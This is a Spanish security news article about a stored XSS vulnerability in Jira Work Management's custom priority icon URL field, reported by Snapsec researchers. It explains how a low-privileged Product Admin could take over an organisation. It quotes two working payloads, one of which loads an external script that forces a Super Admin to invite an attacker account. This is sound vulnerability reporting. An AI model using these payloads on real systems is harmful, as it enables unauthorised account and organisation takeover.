Entradas Mensuales

Síguenos en:

Canal Oficial Telegram de elhacker.NET Grupo Facebook elhacker.NET Twitter elhacker.NET Canal Youtube elhacker.NET Comunidad Steam: Grupo elhacker.NET Mastodon

Entradas populares

PostHeaderIcon Vulnerabilidad de XSS almacenado en Jira Work Management podría permitir la toma total de una organización


Una herramienta de colaboración popular dentro del ecosistema de Atlassian es ampliamente utilizada por organizaciones para rastrear proyectos, gestionar aprobaciones y manejar tareas diarias. Recientemente, investigadores de seguridad de Snapsec descubrieron una crítica vulnerabilidad de Cross-Site Scripting (XSS) almacenado dentro de la plataforma. 



Una herramienta de colaboración popular dentro del ecosistema de Atlassian es ampliamente utilizada por organizaciones para rastrear proyectos, gestionar aprobaciones y manejar tareas diarias.

Recientemente, investigadores de seguridad de Snapsec descubrieron una vulnerabilidad crítica de Stored Cross-Site Scripting (XSS) en la plataforma.

Al explotar un campo de configuración aparentemente de bajo riesgo, el equipo demostró cómo un usuario con privilegios bajos podría lograr un control total de la organización.

Vulnerabilidad de Stored XSS en Jira Work Management

En Jira, las organizaciones rastrean flujos de trabajo utilizando "issues", que contienen campos de datos como la prioridad. Aunque Jira proporciona niveles de prioridad predeterminados, los administradores pueden personalizar tanto las prioridades como sus significados para adaptarse a las necesidades organizativas.

Durante su evaluación, los investigadores notaron que los usuarios con permisos administrativos específicos podían crear una nueva prioridad personalizada y manipular su propiedad "URL del icono".

El backend carecía de validación de entrada adecuada y codificación de salida para este campo de URL específico.

Al establecer la URL del icono con un payload malicioso, como https://google.com?name=</script><script>alert(0)</script>, el equipo logró activar un Stored XSS en el frontend.

Inicia sesión como Product Admin, ve a Configuración y luego haz clic en Issues (fuente: snapsec)
Inicia sesión como Product Admin, ve a Configuración y luego haz clic en Issues (fuente: snapsec)

El Stored XSS es altamente peligroso porque ejecuta scripts maliciosos en el navegador de la víctima simplemente al renderizar una página afectada, sin necesidad de hacer clic en enlaces.

El principal desafío para los investigadores fue armar este XSS autenticado para impactar a administradores de alto nivel.

Para trazar una ruta de ataque, el equipo analizó los roles de gestión de usuarios en Jira para encontrar el rol con menos privilegios capaz de crear una prioridad personalizada.

Identificaron el rol de "Product Admin". Un Product Admin podría no tener acceso directo a aplicaciones internas de Jira como Confluence o Service Management.

Pero conservan la capacidad de realizar tareas básicas de administración, incluyendo la edición de prioridades de issues.

La visita del admin activa una solicitud de invitación automática (fuente: snapsec)
La visita del admin activa una solicitud de invitación automática (fuente: snapsec)

Ejecutando el control total de la organización

Para ejecutar el ataque, un Product Admin comprometido o malicioso navega a la configuración de issues de Jira y añade una nueva prioridad personalizada.

Inyecta un payload dirigido en la URL del icono, como https://google.com?name=</script><script src=https://snapsec.co/jira-xss.js></script>.

Cuando un usuario con mayores privilegios, como un Super Admin, visita la página de prioridades modificada, el payload almacenado se ejecuta silenciosamente en su navegador.

El JavaScript malicioso fuerza la sesión del Super Admin a enviar una solicitud de invitación automática.

Esta solicitud invita a una cuenta controlada por el atacante a la organización y le otorga acceso completo a múltiples productos de Atlassian.

Los admins pueden confirmar a través de la gestión de usuarios (fuente: snapsec)
Los admins pueden confirmar a través de la gestión de usuarios (fuente: snapsec)

Como resultado, el atacante obtiene la capacidad de ver, crear, modificar o eliminar proyectos en todo el entorno, lo que resulta en un compromiso total de la organización.

Esta vulnerabilidad destaca una lección crucial en la seguridad moderna de Software-as-a-Service (SaaS): nunca se debe confiar por defecto en las entradas administrativas.

Incluso plataformas maduras pueden albergar vulnerabilidades de alto impacto cuando se ignora la validación de entradas en paneles de configuración internos.

Además, el control de acceso no equivale automáticamente al control de riesgos. Un usuario con visibilidad de producto restringida aún logró inyectar un payload persistente en un área de configuración globalmente accesible.

Las organizaciones deben aplicar validaciones estrictas en campos personalizables, como destacó Snapsec, para garantizar la seguridad en todos los flujos de trabajo administrativos.



Fuentes:
https://cybersecuritynews.com/stored-xss-bug-in-jira-work-management/


0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.